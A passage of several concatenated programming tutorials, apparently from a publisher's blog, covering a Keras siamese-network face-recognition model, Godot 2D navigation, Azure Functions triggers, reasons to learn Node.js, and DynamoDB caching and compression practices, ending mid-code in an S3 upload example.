            x_imposite_pair[count, 0, 0, :, :] = img1
            x_imposite_pair[count, 1, 0, :, :] = img2

            #as we are drawing images from the different directory we assign label as 0. (imposite pair)
            y_imposite[count] = 0
            count += 1

    #now, concatenate genuine pairs and imposite pairs to get the whole data
    X = np.concatenate([x_geuine_pair, x_imposite_pair], axis=0)/255
    Y = np.concatenate([y_genuine, y_imposite], axis=0)

    return X, Y
```

Now, we generate our data and check its size. As you can see, we have 20,000 data points and, of these, 10,000 are genuine pairs and 10,000 are imposite pairs:

```python
X, Y = get_data(size, total_sample_size)

X.shape
(20000, 2, 1, 56, 46)

Y.shape
(20000, 1)
```

Next, we split our data for training and testing with a 75 percent training and 25 percent testing proportion:

```python
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=.25)
```

Now that we have successfully generated our data, we build our siamese network. First, we define the base network, which is basically a convolutional network used for feature extraction. We build two convolutional layers with ReLU activations and max pooling, followed by a flatten layer:

```python
def build_base_network(input_shape):

    seq = Sequential()

    nb_filter = [6, 12]
    kernel_size = 3

    #convolutional layer 1
    seq.add(Convolution2D(nb_filter[0], kernel_size, kernel_size, input_shape=input_shape,
                          border_mode='valid', dim_ordering='th'))
    seq.add(Activation('relu'))
    seq.add(MaxPooling2D(pool_size=(2, 2)))
    seq.add(Dropout(.25))

    #convolutional layer 2
    seq.add(Convolution2D(nb_filter[1], kernel_size, kernel_size, border_mode='valid', dim_ordering='th'))
    seq.add(Activation('relu'))
    seq.add(MaxPooling2D(pool_size=(2, 2), dim_ordering='th'))
    seq.add(Dropout(.25))

    #flatten
    seq.add(Flatten())
    seq.add(Dense(128, activation='relu'))
    seq.add(Dropout(0.1))
    seq.add(Dense(50, activation='relu'))
    return seq
```

Next, we feed the image pair to the base network, which will return the embeddings, that is, the feature vectors:

```python
input_dim = x_train.shape[2:]
img_a = Input(shape=input_dim)
img_b = Input(shape=input_dim)

base_network = build_base_network(input_dim)
feat_vecs_a = base_network(img_a)
feat_vecs_b = base_network(img_b)
```

feat_vecs_a and feat_vecs_b are the feature vectors of our image pair.
Next, we feed these feature vectors to the energy function to compute the distance between them, and we use Euclidean distance as our energy function:

```python
def euclidean_distance(vects):
    x, y = vects
    return K.sqrt(K.sum(K.square(x - y), axis=1, keepdims=True))

def eucl_dist_output_shape(shapes):
    shape1, shape2 = shapes
    return (shape1[0], 1)

distance = Lambda(euclidean_distance, output_shape=eucl_dist_output_shape)([feat_vecs_a, feat_vecs_b])
```

Now, we set the epoch length to 13, use the RMSprop optimizer, and define our model (the model inputs are the two image inputs, img_a and img_b, defined earlier):

```python
epochs = 13
rms = RMSprop()

model = Model(input=[img_a, img_b], output=distance)
```

Next, we define our loss function as the contrastive_loss function and compile the model:

```python
def contrastive_loss(y_true, y_pred):
    margin = 1
    return K.mean(y_true * K.square(y_pred) + (1 - y_true) * K.square(K.maximum(margin - y_pred, 0)))

model.compile(loss=contrastive_loss, optimizer=rms)
```

Now, we train our model:

```python
img_1 = x_train[:, 0]
img_2 = x_train[:, 1]

model.fit([img_1, img_2], y_train, validation_split=.25, batch_size=128, verbose=2, nb_epoch=epochs)
```

You can see how the loss decreases over the epochs:

```
Train on 11250 samples, validate on 3750 samples
Epoch 1/13
 - 60s - loss: 0.2179 - val_loss: 0.2156
Epoch 2/13
 - 53s - loss: 0.1520 - val_loss: 0.2102
Epoch 3/13
 - 53s - loss: 0.1190 - val_loss: 0.1545
Epoch 4/13
 - 55s - loss: 0.0959 - val_loss: 0.1705
Epoch 5/13
 - 52s - loss: 0.0801 - val_loss: 0.1181
Epoch 6/13
 - 52s - loss: 0.0684 - val_loss: 0.0821
Epoch 7/13
 - 52s - loss: 0.0591 - val_loss: 0.0762
Epoch 8/13
 - 52s - loss: 0.0526 - val_loss: 0.0655
Epoch 9/13
 - 52s - loss: 0.0475 - val_loss: 0.0662
Epoch 10/13
 - 52s - loss: 0.0444 - val_loss: 0.0469
Epoch 11/13
 - 52s - loss: 0.0408 - val_loss: 0.0478
Epoch 12/13
 - 52s - loss: 0.0381 - val_loss: 0.0498
Epoch 13/13
 - 54s - loss: 0.0356 - val_loss: 0.0363
```

Now, we make predictions with the test data:

```python
pred = model.predict([x_test[:, 0], x_test[:, 1]])
```

Next, we define a function for computing accuracy:

```python
def compute_accuracy(predictions, labels):
    return labels[predictions.ravel() < 0.5].mean()
```

Now, we compute the accuracy of the model:

```python
compute_accuracy(pred, y_test)
0.9779092702169625
```

In this tutorial, we have learned to build face recognition models using siamese networks. The architecture of a siamese network basically consists of two identical neural networks, both having the same weights and architecture, and the output of these networks is plugged into some energy function to understand the similarity.

To learn more about meta-learning with Python, check out the book Hands-On Meta-Learning with Python.

What is Meta-Learning?
Introducing Open AI's Reptile: The latest scalable meta-learning Algorithm on the block
"Deep meta reinforcement learning will be the future of AI where we will be so close to achieving artificial general intelligence (AGI)", Sudharsan Ravichandiran


How to Create 2D Navigation with the Godot Engine

George Marques
18 Nov 2016
6 min read
The Godot Engine has built-in functionality that makes it easy to create navigation in the game world. This post will cover how to make an object follow a fixed path and how to travel between two points while avoiding the obstacles in the way.

Following a fixed path

Godot has a couple of nodes that help you create a path that can be followed by another node. One use of this is to make an NPC follow a fixed path in the map. Assuming you have a new project, create a Path2D node. You can then use the controls on the toolbar to make a curve representing the path you will need to follow.

Curve buttons

After adding the points and adjusting the curves, you will have something like the following:

Path curve

Now you need to add a PathFollow2D node as a child of Path2D. This will do the actual movement, based on the Offset property. Then add an AnimationPlayer node as a child of the PathFollow2D. Create a new animation in the player and set the length to five seconds. Add a keyframe at the start with the value 0 for the Unit Offset property of PathFollow2D. You can do that by clicking on the key icon next to the property in the Inspector dock. Then go to the end of the animation and add a frame with the value of 1. This will make Unit Offset go from 0 to 1 over the length of the animation (five seconds in this case). Set the animation to loop and autoplay.

To see the effect in practice, add a Sprite node as a child of PathFollow2D. You can use the default Godot icon as its texture. Enable Visible Navigation under the Debug Options menu (the last button in the top center bar) to make it easier to see. Save the scene and play it to see the Godot robot run around the screen:

Sprite following path

That's it! Making an object follow a fixed path is quite easy with the built-in resources of Godot. Not even scripting is needed for this example.

Navigation and Avoiding Obstacles

Sometimes you don't have a fixed path to follow. It might change dynamically, or your AI must determine the path and avoid the obstacles and walls that might be in the way. Don't worry, because Godot will also help you in this regard.

Create a new scene and add a Node2D as the root. Then add a Navigation2D as its child. This will be responsible for creating the paths for you. You now need to add a NavigationPolygonInstance node as a child of the Navigation2D. This will hold the polygon used for navigation, which determines the passable areas. To create the polygon itself, click on the pencil button on the toolbar (it will appear only if the NavigationPolygonInstance node is selected). The first time you try to add a point, the editor will warn you that there's no NavigationPolygon resource and will offer to create one. Click on the Create button and all will be set.

Navigation resource warning

First, you need to create the outer boundaries of the navigable area. The polygon can have as many points as you need, but it does need to be a closed polygon. Note that you can right-click on points to remove them and hold Ctrl while clicking on lines to add points. Once you finish the boundaries, click the pencil button again and create polygons inside it to mark the impassable areas, such as the walls. You will end up with something like the following:

Navigation polygon

Add a Sprite node as a child of the root Node2D and set its texture (you can use the default Godot icon). This will be the object navigating through the space. Now add the following script to the root node.
The most important detail here is the get_simple_path function, which returns a list of points to travel from start to end without passing through the walls.

```gdscript
extends Node2D

# Global variables
var start = Vector2()
var end = Vector2()
var path = []
var speed = 1
var transition = 0
var path_points = 0

func _ready():
    # Enable the processing of user input
    set_process_input(true)
    # Enable the general process callback
    set_process(true)

func _input(event):
    # If the user presses a mouse button
    if event.type == InputEvent.MOUSE_BUTTON and event.pressed:
        if event.button_index == BUTTON_LEFT:
            # If it's the left button, set the starting point
            start = event.global_pos
        elif event.button_index == BUTTON_RIGHT:
            # If it's the right button, set the ending point
            end = event.global_pos
        # Reset the sprite position
        get_node("Sprite").set_global_pos(start)
        transition = 0

func _process(delta):
    # Get the list of points that compose the path
    path = get_node("Navigation2D").get_simple_path(start, end)
    # If the path has fewer points than it did before, reset the transition point
    if path.size() < path_points:
        transition = 0
    # Update the current amount of points
    path_points = path.size()
    # If there are fewer than 2 points, nothing can be done
    if path_points < 2:
        return
    var sprite = get_node("Sprite")
    # This uses the linear interpolation function from Vector2 to move the sprite at a constant
    # rate through the points of the path. Transition is a value from 0 to 1 to be used as a ratio.
    sprite.set_global_pos(sprite.get_global_pos().linear_interpolate(path[1], transition))
    start = sprite.get_global_pos()
    transition += speed * delta
    # Reset the transition when it gets to the point.
    if transition > 1:
        transition = 0
    # Update the node so the _draw() function is called
    update()

func _draw():
    # This draws a white circle with a radius of 10px for each point in the path
    for p in path:
        draw_circle(p, 10, Color(1, 1, 1))
```

Enable Visible Navigation in the Debug Options button to help you visualize the effect. Save and run the scene. You can then left-click somewhere to define a starting point and right-click to define the ending point. The points will be marked as white circles, and the Sprite will follow the path, clearing the intermediate points as it travels along.

Navigating Godot bot

Conclusion

The Godot Engine has many features to ease the development of all kinds of games. The navigation functions have many uses in top-down games, be it an RPG or an RTS. Tilesets can also embed navigation polygons that can be used in a similar fashion.

About the Author

George Marques is a Brazilian software developer who has been playing with programming in a variety of environments since he was a kid. He works as a freelance programmer for web technologies based on open source solutions such as WordPress and Open Journal Systems. He's also one of the regular contributors to the Godot Engine, helping solve bugs and add new features to the software, while also giving solutions to the community for the questions they have.


Creating triggers in Azure Functions [Tutorial]

Bhagyashree R
26 Nov 2018
8 min read
A trigger is an event or situation that causes something to start. This something can be some sort of processing of data or some other service that performs some action. Triggers are just a set of functions that get executed when some event gets fired. In Azure, we have different types of triggers, such as an implicit trigger, and we can also create a manual trigger. With, Azure Functions you can write code in response to a trigger in Azure. [box type="shadow" align="" class="" width=""]This article is taken from the book Learning Azure Functions by Manisha Yadav and Mitesh Soni. In this book, you will you learn the techniques of scaling your Azure functions and making the most of serverless architecture. [/box] In this article, we will see the common types of triggers and learn how to create a trigger with a very simple example. We will also learn about the HTTP trigger, event bus, and service bus. Common types of triggers Let's understand first how a trigger works and get acquainted with the different types of triggers available in Azure Functions. The architecture of a trigger and how it works is shown in the following figure: The preceding diagram shows the event that fires the trigger and once the trigger is fired, it runs the Azure Function associated with it. We need to note a very important point here: one function must have exactly one trigger; in other words, one function can't have multiple triggers. Now let's see the different types of trigger available in Azure: TimerTrigger: This trigger is called on a predefined schedule. We can set the time for execution of the Azure Function using this trigger. BlobTrigger: This trigger will get fired when a new or updated blob is detected. The blob contents are provided as input to the function. EventHubTrigger: This trigger is used for the application instrumentation, the user experience, workflow processing, and in the Internet of Things (IoT). This trigger will get fired when any events are delivered to an Azure event hub. HTTPTrigger: This trigger gets fired when the HTTP request comes. QueueTrigger: This trigger gets fired when any new messages come in an Azure Storage queue. Generic Webhook: This trigger gets fired when the Webhook HTTP requests come from any service that supports Webhooks. GitHub Webhook: This trigger is fired when an event occurs in your GitHub repositories. The GitHub repository supports events such as Branch created, Delete branch, Issue comment, and Commit comment. Service Bus trigger: This trigger is fired when a new message comes from a service bus queue or topic. Example of creating a simple scheduled trigger in Azure Consider a simple example where we have to display a "good morning" message on screen every day in the morning at 8 AM. This situation is related to time so we need to use a schedule trigger. We will look at this type of trigger later in this article. Let's first start creating a function with the schedule trigger first: Log in to the Azure Portal. Click on the top left + icon | Compute | Function App: Once we click on Function App, the next screen will appear, where we have to provide a unique function App name, Subscription, Resource Group, Hosting Plan, Location, Storage, and then click on the Create button: Once we click on the Create button, Azure will start to deploy this function. 
Once this function is deployed, it will be seen in Notifications, as shown in the following screenshot: Click on Notifications and check the Functions details and add the trigger: To add a trigger in this function, click on the + icon next to Functions and then click on Custom function: Now we have to select Language and type the name of the trigger. Once we provide the name and trigger value it will provide the available template for us after filtering all the templates: Scroll down and type the trigger name and schedule. The Schedule value is a six-field CRON expression. Click on the Create button: By providing 0 0/5 * * * *, the function will run every 5 minutes from the first run. Once we click on the Create button, we will see the template code on the screen as follows: Here, we have to write code. Whatever action we want to perform, we have to write it here. Now write the code and click on the Save and run button. Once we run the code, we can see the output in the logs, as shown in the following screenshot: Note the timing. It runs at an interval of 5 minutes. Now we want it to run only once a day at 8 AM. To do this, we have to change the value of the schedule. To edit the value in the trigger, click on Integrate, type the value, and then click on the Save button: Now, again, click on goodMorningTriggerJS, modify the code, and test it. So, this is all about creating a simple trigger with the Azure Function. Now, we will look at the different types of triggers available in Azure. HTTP trigger The HTTP trigger is normally used to create the API or services, where we request for data using the HTTP protocol and get the response. We can also integrate the HTTP trigger with a Webhook. Let's start creating the HTTP trigger. We have already created a simple Azure Function and trigger. Now we will create the HTTP Login API. In this, we will send the login credential through an HTTP post request and get the response as to whether the user is valid or not. Since we have already created a Function app in the previous example, we can now add multiple functions to it: Click on +, select HttpTrigger-JavaScript, provide the function name, and click on the Create button: After we click on the Create button, the default template will be available. Now, we can edit and test the function: Now edit the code as follows: Save and run the code, as shown in the following screenshot: The login service is ready. Now let's check this service in Postman. To get the URL from the function, click on Get function URL: We will use Postman to check our service. Postman is a Chrome extension for API developers to test APIs. To add the Chrome extension, go to Settings in Chrome and select More tools | Extensions, as shown in the following screenshot: Click on Get more extensions: Now search for postman and then click on + ADD TO CHROME: Click on Add app: Launch the Postman app. Click on Sign Up with Google: The Postman window will look like this: Once the initial setup is done, test the API. Copy the function URL and paste it in Postman. Select the method type POST and provide a request body and click on the Send button: If we provide the correct username and password in the request body, we will get the response, user is valid; otherwise, the response will be invalid user. In the next section, we will discuss event hubs. Event hubs Event hubs are created to help us with the challenge of handling a huge amount of event-based messaging. 
The idea is that if we have apps or devices that publish a large amount of events in a very short duration (for example, a real-time voting system), then event hubs can be the place where we can send the event. Event hubs will create a stream of all the events which can be processed at some point in different ways. An event hub trigger is used to respond to an event sent to an event hub event stream. The following diagram shows how a trigger works with an Event Hub: Service bus The service bus is used to provide interaction between services or applications run in the cloud with other services or applications. The service bus trigger is used to give the response to messages which come from the service bus queue or topic. We have two types of service bus triggers: Service bus queue trigger: A queue is basically for first-in-first-out messages. When a message comes from the service bus, the service bus queue trigger gets fired and the Azure Function is called. In the Azure Function, we can process the message and then deliver it. Service bus topic trigger: The topic is useful for scaling to very large numbers of recipients. Finally, we have completed the trigger part of the Azure Function. In this article, we have discussed the architecture of a trigger and how the trigger works. We have covered different types of triggers available in Azure. We created one simple example of a schedule trigger and discussed the workflow of the schedule trigger. We discussed the HTTP trigger in detail and how the HTTP trigger works. Then we created an API using the HTTP trigger. We covered the event hub, service bus. We also covered how a trigger works with these services. If you found this post useful, do check out the book, Learning Azure Functions. This book walks you through the techniques of scaling your Azure functions and will help you make the most of serverless architecture. Anatomy of an Azure function App [Tutorial] Implementing Identity Security in Microsoft Azure [Tutorial] Azure Functions 2.0 launches with better workload support for serverless
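As a closing aside to the schedule-trigger walkthrough above, the same daily 8 AM idea can also be expressed in code rather than through the portal editor. The sketch below uses the Azure Functions Python worker, which is an assumption on my part — the tutorial above uses the portal's JavaScript template — and the function body and log messages are illustrative only. The six-field CRON expression (for example, 0 0 8 * * *) lives in the function's timer binding configuration, not in the script itself.

import datetime
import logging

import azure.functions as func


# Illustrative sketch only: the body of a timer-triggered function for the Python worker.
# The binding configuration (not shown here) would declare a timerTrigger with the
# schedule "0 0 8 * * *" so that this runs once a day at 8 AM.
def main(mytimer: func.TimerRequest) -> None:
    if mytimer.past_due:
        logging.info("The timer is running late")
    logging.info("Good morning! Trigger fired at %s", datetime.datetime.utcnow().isoformat())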

5 reasons you should learn Node.js

Richard Gall
22 Feb 2019
7 min read
Open source software in general, and JavaScript in particular, can seem like a place where boom and bust is the rule of law: rapid growth before everyone moves on to the next big thing. But Node.js is different. Although it certainly couldn't be described as new, and its growth hasn't been dramatic by any measure, over the last few years it has managed to push itself forward as one of the most widely used JavaScript tools on the planet.

Do you want to learn Node.js?

Popularity, however, can only tell you so much. The key question, if you're reading this, is whether you should learn Node.js. So, to help you decide if it's time to learn it, here's a list of the biggest reasons why you should start learning Node.js... Learn everything you need to know about Node.js with Packt's Node.js Complete Reference Guide Book Learning Path.

Node.js lets you write JavaScript on both client and server

Okay, let's get the obvious one out of the way first: Node.js is worth learning because it allows you to write JavaScript on the server. This has arguably transformed the way we think about JavaScript. Whereas in the past it was a language written specifically for the client, backed on the server by the likes of PHP and Java, it's now a language that you can use across your application. Read next: The top 5 reasons Node.js could topple Java

This is important because it means teams can work much more efficiently together. Using different languages for backend and frontend is typically a major source of friction. Unless you have very good polyglot developers, a team is restricted to its core skills, while tooling is also more inflexible. If you're using JavaScript across the stack, it's easier to use a consistent toolchain.

From a personal perspective, learning Node.js is a great starting point for full stack development. In essence, it's like an add-on that immediately expands what you can do with JavaScript. In terms of your career, then, it could well make you an invaluable asset to a development team. Read next: How is Node.js changing web development?

Node.js allows you to build complex and powerful applications without writing complex code

Another strong argument for Node.js is that it is built for performance. This is because of two important things: Node.js' asynchronous, event-driven architecture, and the fact that it uses the V8 JavaScript engine. The significance of this is that V8 is one of the fastest implementations of JavaScript, used to power many of Google's immensely popular in-browser products (like Gmail).

Node.js is powerful because it employs an asynchronous paradigm for handling data between client and server. To clarify what this means, it's worth comparing it to the typical application server model that uses blocking I/O: in that model, the application has to handle each request sequentially, suspending threads until they can be processed. This can add complexity to an application and, of course, slows an application down. In contrast, Node.js uses non-blocking I/O, where a single thread (working through requests sequentially rather than concurrently) can manage multiple requests. If a request can't be processed immediately, it's effectively 'withheld' as a promise, which means it can be executed later without holding up other work. This means Node.js can help you build applications of considerable complexity without adding to the complexity of your code.
Node.js is well suited to building microservices Microservices have become a rapidly growing architectural style that offer increased agility and flexibility over the traditional monolith. The advantages of microservices are well documented, and whether or not they’re right for you now, it’s likely that they’re going to dominate the software landscape as the world moves away from monolithic architecture. This fact only serves to strengthen the argument that you should learn Node.js because the library is so well suited to developing in this manner. This is because it encourages you to develop in a modular and focused manner, quite literally using specific modules to develop an application. This is distinct and almost at odds with the monolithic approach to software architecture. At this point, it’s probably worth highlighting that it’s incredibly easy to package and publish the modules you build thanks to npm (node package manager). So, even if you haven’t yet worked with microservices, learning Node.js is a good way to prepare yourself for a future where they are going to become even more prevalent. Node.js can be used for more than just web development We know by now that Node.js is flexible. But it’s important to recognise that its flexibility means it can be used for a wide range of different purposes. Yes, the library's community are predominantly building applications for the web, but it’s also a useful tool for those working in ops or infrastructure. This is because Node.js is a great tool for developing other development tools. If you’re someone working to support a team of developers, or, indeed, to help manage an entire distributed software infrastructure, it could be vital in empowering you to get creative and build your own support tools. Even more surprisingly, Node.js can be used in some IoT projects. As this post from 2016 suggests, the two things might not be quite such strange bedfellows. Node.js is a robust project that won't be going anywhere As I’ve already said, in the JavaScript world frameworks and tools can appear and disappear quickly. That means deciding what to learn, and, indeed, what to integrate into your stack, can feel like a bit of a gamble. However, you can be sure that Node.js is here to stay. There are a number of reasons for this. For starters, there’s no other tool that brings JavaScript to the server. But more than that, with Google betting heavily on V8 - which is, as we’ve seen, such an important part of the project - you can be sure it’s only going to go from strength to strength. It’s also worth pointing out that Node.js went through a small crisis when io.js broke away from the main Node.js project. This feud was as much personal as it was technical, but with the rift healed, and the Node.js Foundation now managing the whole project, helping to ensure that the software is continually evolving with other relevant technological changes and that the needs of the developers who use it continue to be met. Conclusion: spend some time exploring Node.js before you begin using it at work That’s just 5 reasons why you should learn Node.js. You could find more, but broadly speaking these all underline its importance in today’s development world. If you’re still not convinced, there’s a caveat. If Node.js isn’t yet right for you, don’t assume that it’s going to fix any technological or cultural issues that have been causing you headaches. It probably won’t. In fact, you should probably tackle those challenges before deciding to use it. 
But that all being said, even if you don’t think it’s the right time to use Node.js professionally, that doesn’t mean it isn’t worth learning. As you can see, it’s well worth your time. Who knows where it might take you? Ready to begin learning? Purchase Node.js Complete Reference Guide or read it for free with a subscription free trial.

DynamoDB Best Practices

Packt
15 Sep 2015
24 min read
 In this article by Tanmay Deshpande, the author of the book DynamoDB Cookbook, we will cover the following topics: Using a standalone cache for frequently accessed items Using the AWS ElastiCache for frequently accessed items Compressing large data before storing it in DynamoDB Using AWS S3 for storing large items Catching DynamoDB errors Performing auto-retries on DynamoDB errors Performing atomic transactions on DynamoDB tables Performing asynchronous requests to DynamoDB (For more resources related to this topic, see here.) Introduction We are going to talk about DynamoDB implementation best practices, which will help you improve the performance while reducing the operation cost. So let's get started. Using a standalone cache for frequently accessed items In this recipe, we will see how to use a standalone cache for frequently accessed items. Cache is a temporary data store, which will save the items in memory and will provide those from the memory itself instead of making a DynamoDB call. Make a note that this should be used for items, which you expect to not be changed frequently. Getting ready We will perform this recipe using Java libraries. So the prerequisite is that you should have performed recipes, which use the AWS SDK for Java. How to do it… Here, we will be using the AWS SDK for Java, so create a Maven project with the SDK dependency. Apart from the SDK, we will also be using one of the most widely used open source caches, that is, EhCache. To know about EhCache, refer to http://ehcache.org/. Let's use a standalone cache for frequently accessed items: To use EhCache, we need to include the following repository in pom.xml: <repositories> <repository> <id>sourceforge</id> <name>sourceforge</name> <url>https://oss.sonatype.org/content/repositories/ sourceforge-releases/</url> </repository> </repositories> We will also need to add the following dependency: <dependency> <groupId>net.sf.ehcache</groupId> <artifactId>ehcache</artifactId> <version>2.9.0</version> </dependency> Once the project setup is done, we will create a cachemanager class, which will be used in the following code: public class ProductCacheManager { // Ehcache cache manager CacheManager cacheManager = CacheManager.getInstance(); private Cache productCache; public Cache getProductCache() { return productCache; } //Create an instance of cache using cache manager public ProductCacheManager() { cacheManager.addCache("productCache"); this.productCache = cacheManager.getCache("productCache"); } public void shutdown() { cacheManager.shutdown(); } } Now, we will create another class where we will write a code to get the item from DynamoDB. Here, we will first initiate the ProductCacheManager: static ProductCacheManager cacheManager = new ProductCacheManager(); Next, we will write a method to get the item from DynamoDB. Before we fetch the data from DynamoDB, we will first check whether the item with the given key is available in cache. If it is available in cache, we will return it from cache itself. If the item is not found in cache, we will first fetch it from DynamoDB and immediately put it into cache. 
Once the item is cached, every time we need this item, we will get it from cache, unless the cached item is evicted: private static Item getItem(int id, String type) { Item product = null; if (cacheManager.getProductCache().isKeyInCache(id + ":" + type)) { Element prod = cacheManager.getProductCache().get(id + ":" + type); product = (Item) prod.getObjectValue(); System.out.println("Returning from Cache"); } else { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("product"); product = table.getItem(new PrimaryKey("id", id, "type", type)); cacheManager.getProductCache().put( new Element(id + ":" + type, product)); System.out.println("Making DynamoDB Call for getting the item"); } return product; } Now we can use this method whenever needed. Here is how we can test it: Item product = getItem(10, "book"); System.out.println("First call :Item: " + product); Item product1 = getItem(10, "book"); System.out.println("Second call :Item: " + product1); cacheManager.shutdown(); How it works… EhCache is one of the most popular standalone caches used in the industry. Here, we are using EhCache to store frequently accessed items from the product table. Cache keeps all its data in memory. Here, we will save every item against its keys that are cached. We have the product table, which has the composite hash and range keys, so we will also store the items against the key of (Hash Key and Range Key). Note that caching should be used for only those tables that expect lesser updates. It should only be used for the table, which holds static data. If at all anyone uses cache for not so static tables, then you will get stale data. You can also go to the next level and implement a time-based cache, which holds the data for a certain time, and after that, it clears the cache. We can also implement algorithms, such as Least Recently Used (LRU), First In First Out (FIFO), to make the cache more efficient. Here, we will make comparatively lesser calls to DynamoDB, and ultimately, save some cost for ourselves. Using AWS ElastiCache for frequently accessed items In this recipe, we will do the same thing that we did in the previous recipe. The only thing we will change is that we will use a cloud hosted distributed caching solution instead of saving it on the local standalone cache. ElastiCache is a hosted caching solution provided by Amazon Web Services. We have two options to select which caching technology you would need. One option is Memcached and another option is Redis. Depending upon your requirements, you can decide which one to use. Here are links that will help you with more information on the two options: http://memcached.org/ http://redis.io/ Getting ready To get started with this recipe, we will need to have an ElastiCache cluster launched. If you are not aware of how to do it, you can refer to http://aws.amazon.com/elasticache/. How to do it… Here, I am using the Memcached cluster. You can choose the size of the instance as you wish. We will need a Memcached client to access the cluster. Amazon has provided a compiled version of the Memcached client, which can be downloaded from https://github.com/amazonwebservices/aws-elasticache-cluster-client-memcached-for-java. 
Once the JAR download is complete, you can add it to your Java Project class path: To start with, we will need to get the configuration endpoint of the Memcached cluster that we launched. This configuration endpoint can be found on the AWS ElastiCache console itself. Here is how we can save the configuration endpoint and port: static String configEndpoint = "my-elastic- cache.mlvymb.cfg.usw2.cache.amazonaws.com"; static Integer clusterPort = 11211; Similarly, we can instantiate the Memcached client: static MemcachedClient client; static { try { client = new MemcachedClient(new InetSocketAddress(configEndpoint, clusterPort)); } catch (IOException e) { e.printStackTrace(); } } Now, we can write the getItem method as we did for the previous recipe. Here, we will first check whether the item is present in cache; if not, we will fetch it from DynamoDB, and put it into cache. If the same request comes the next time, we will return it from the cache itself. While putting the item into cache, we are also going to put the expiry time of the item. We are going to set it to 3,600 seconds; that is, after 1 hour, the key entry will be deleted automatically: private static Item getItem(int id, String type) { Item product = null; if (null != client.get(id + ":" + type)) { System.out.println("Returning from Cache"); return (Item) client.get(id + ":" + type); } else { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("product"); product = table.getItem(new PrimaryKey("id", id, "type", type)); System.out.println("Making DynamoDB Call for getting the item"); ElasticCache.client.add(id + ":" + type, 3600, product); } return product; } How it works… A distributed cache also works in the same fashion as the local one works. A standalone cache keeps the data in memory and returns it if it finds the key. In distributed cache, we have multiple nodes; here, keys are kept in a distributed manner. The distributed nature helps you divide the keys based on the hash value of the keys. So, when any request comes, it is redirected to a specified node and the value is returned from there. Note that ElastiCache will help you provide a faster retrieval of items at the additional cost of the ElastiCache cluster. Also note that the preceding code will work if you execute the application from the EC2 instance only. If you try to execute this on the local machine, you will get connection errors. Compressing large data before storing it in DynamoDB We are all aware of DynamoDB's storage limitations for the item's size. Suppose that we get into a situation where storing large attributes in an item is a must. In that case, it's always a good choice to compress these attributes, and then save them in DynamoDB. In this recipe, we are going to see how to compress large items before storing them. Getting ready To get started with this recipe, you should have your workstation ready with Eclipse or any other IDE of your choice. How to do it… There are numerous algorithms with which we can compress the large items, for example, GZIP, LZO, BZ2, and so on. Each algorithm has a trade-off between the compression time and rate. So, it's your choice whether to go with a faster algorithm or with an algorithm, which provides a higher compression rate. Consider a scenario in our e-commerce website, where we need to save the product reviews written by various users. 
For this, we created a ProductReviews table, where we will save the reviewer's name, its detailed product review, and the time when the review was submitted. Here, there are chances that the product review messages can be large, and it would not be a good idea to store them as they are. So, it is important to understand how to compress these messages before storing them. Let's see how to compress large data: First of all, we will write a method that accepts the string input and returns the compressed byte buffer. Here, we are using the GZIP algorithm for compressions. Java has a built-in support, so we don't need to use any third-party library for this: private static ByteBuffer compressString(String input) throws UnsupportedEncodingException, IOException { // Write the input as GZIP output stream using UTF-8 encoding ByteArrayOutputStream baos = new ByteArrayOutputStream(); GZIPOutputStream os = new GZIPOutputStream(baos); os.write(input.getBytes("UTF-8")); os.finish(); byte[] compressedBytes = baos.toByteArray(); // Writing bytes to byte buffer ByteBuffer buffer = ByteBuffer.allocate(compressedBytes.length); buffer.put(compressedBytes, 0, compressedBytes.length); buffer.position(0); return buffer; } Now, we can simply use this method to store the data before saving it in DynamoDB. Here is an example of how to use this method in our code: private static void putReviewItem() throws UnsupportedEncodingException, IOException { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("ProductReviews"); Item product = new Item() .withPrimaryKey(new PrimaryKey("id", 10)) .withString("reviewerName", "John White") .withString("dateTime", "20-06-2015T08:09:30") .withBinary("reviewMessage", compressString("My Review Message")); PutItemOutcome outcome = table.putItem(product); System.out.println(outcome.getPutItemResult()); } In a similar way, we can write a method that decompresses the data on retrieval from DynamoDB. Here is an example: private static String uncompressString(ByteBuffer input) throws IOException { byte[] bytes = input.array(); ByteArrayInputStream bais = new ByteArrayInputStream(bytes); ByteArrayOutputStream baos = new ByteArrayOutputStream(); GZIPInputStream is = new GZIPInputStream(bais); int chunkSize = 1024; byte[] buffer = new byte[chunkSize]; int length = 0; while ((length = is.read(buffer, 0, chunkSize)) != -1) { baos.write(buffer, 0, length); } return new String(baos.toByteArray(), "UTF-8"); } How it works… Compressing data at client side has numerous advantages. Lesser size means lesser use of network and disk resources. Compression algorithms generally maintain a dictionary of words. While compressing, if they see the words getting repeated, then those words are replaced by their positions in the dictionary. In this way, the redundant data is eliminated and only their references are kept in the compressed string. While uncompressing the same data, the word references are replaced with the actual words, and we get our normal string back. Various compression algorithms contain various compression techniques. Therefore, the compression algorithm you choose will depend on your need. Using AWS S3 for storing large items Sometimes, we might get into a situation where storing data in a compressed format might not be sufficient enough. 
Consider a case where we might need to store large images or binaries that might exceed the DynamoDB's storage limitation per items. In this case, we can use AWS S3 to store such items and only save the S3 location in our DynamoDB table. AWS S3: Simple Storage Service allows us to store data in a cheaper and efficient manner. To know more about AWS S3, you can visit http://aws.amazon.com/s3/. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Consider a case in our e-commerce website where we would like to store the product images along with the product data. So, we will save the images on AWS S3, and only store their locations along with the product information in the product table: First of all, we will see how to store data in AWS S3. For this, we need to go to the AWS console, and create an S3 bucket. Here, I created a bucket called e-commerce-product-images, and inside this bucket, I created folders to store the images. For example, /phone/apple/iphone6. Now, let's write the code to upload the images to S3: private static void uploadFileToS3() { String bucketName = "e-commerce-product-images"; String keyName = "phone/apple/iphone6/iphone.jpg"; String uploadFileName = "C:\tmp\iphone.jpg"; // Create an instance of S3 client AmazonS3 s3client = new AmazonS3Client(new ProfileCredentialsProvider()); // Start the file uploading File file = new File(uploadFileName); s3client.putObject(new 